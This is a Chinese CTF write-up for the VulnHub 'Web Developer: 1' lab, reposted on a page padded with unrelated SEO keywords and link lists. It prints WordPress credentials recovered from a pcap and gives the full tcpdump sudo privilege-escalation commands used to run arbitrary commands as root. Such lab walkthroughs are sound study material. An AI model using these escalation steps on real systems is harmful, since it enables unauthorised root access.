当前位置: 首页 > news >正文

记事本网站开发广州 网站开发 公司

记事本网站开发,广州 网站开发 公司,怎么做网站的步骤,企业网站管理系统怎么用vulnhub:Web Developer: 1 ~ VulnHub 导入靶机,放在kali同网段,扫描 靶机在192.168.114.129,扫描端口 有网站服务,访问 没什么东西,扫目录 真不少,访问一下,也只是一些普通的Wordpr…

vulnhub:Web Developer: 1 ~ VulnHub

导入靶机,放在kali同网段,扫描

image-20240927105502127

靶机在192.168.114.129,扫描端口

image-20240927105531584

有网站服务,访问

image-20240927105614112

没什么东西,扫目录

image-20240927105857018

真不少,访问一下,也只是一些普通的Wordpress的页面,换个字典再扫一次

image-20240927110129801

这次多出来一个ipdata目录

image-20240927110151616

里面有个cap文件,下载

image-20240927110440782

在里面找到了账号密码

webdeveloper:Te5eQg&4sBS!Yr$)wf%(DcAd

登录wordpress

image-20240927110929501

靶机似乎有点问题,我这里跳过获取Wordpress的shell,请自行参考别的wp

webdeveloper:MasterOfTheUniverse

登录

image-20240927113845080

根据sudo -l,我们可以运行tcpdump

image-20240927113925849

查看提权网站的使用方式

COMMAND='ls -al /root'

TF=$(mktemp)

echo "$COMMAND" > $TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

image-20240927114206130

执行完成后,再开一个终端,执行命令

nc -v -z -n -w 1 127.0.0.1 1

image-20240927114407300

可以看到原来的终端执行了ls -al /root命令,所以我们只需要替换命令就可以查看flag

image-20240927114357740

COMMAND='cat /root/flag.txt'

TF=$(mktemp)

echo "$COMMAND" > $TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

http://www.yayakq.cn/news/959496/

相关文章:

  • 企石做网站公司网站推广是做什么
  • 同个网站可以做多个外链吗做网站建设公司赚钱吗
  • 宁夏建设主管部门网站企业网站功能需求文档
  • 网站推广在哪好外贸网站域名费怎么查询
  • 小学学校网站设计模板上海迪士尼乐园官网
  • 网站运营策划提案网络营销推广方案有哪些
  • 满足seo需求的网站东莞市手机网站建设品牌
  • 国外网站模版免费下载传统网站有没有建设必要
  • 网站编辑转做新媒体运营网站换模板要怎么做
  • 科普网站栏目建设方案策划网站建设文章官网
  • html5炫酷的网站建设一个网站费用
  • 郑州网站建设知名公司百度一下你就知道官网首页
  • 安庆网站建设wordpress 过期时间
  • 大型网站开发协调网站百度知道
  • 网站开发流程中网站制作包括建筑模板多少钱一块
  • 公司建站后还要录入网页吗石家庄便宜网站制作
  • 优质的外国网站工信部查询网站备案
  • 长春企业自助建站优设网免费素材
  • 重庆市做网站的公司wordpress在哪里
  • 网站做数据分析的意义苏州哪里做网站好
  • 官网网站系统青岛市建设局网站
  • 做熟食的网站美食网站wordpress 制作小工具栏
  • 学校资源网站建设目标购物平台大全
  • 网站建设需求调研表帆软社区app哪里下载
  • 建设网站的子文件夹怎么做网站的广告
  • 国产手机做系统下载网站简易的网站模板
  • 广州网站建设网络科技有限公司微信怎么自己创建公众号
  • 电脑路由器做网站服务器二季域名做网站
  • 经典的网站设计工具c 做视频网站
  • 网站文件解压爱站网app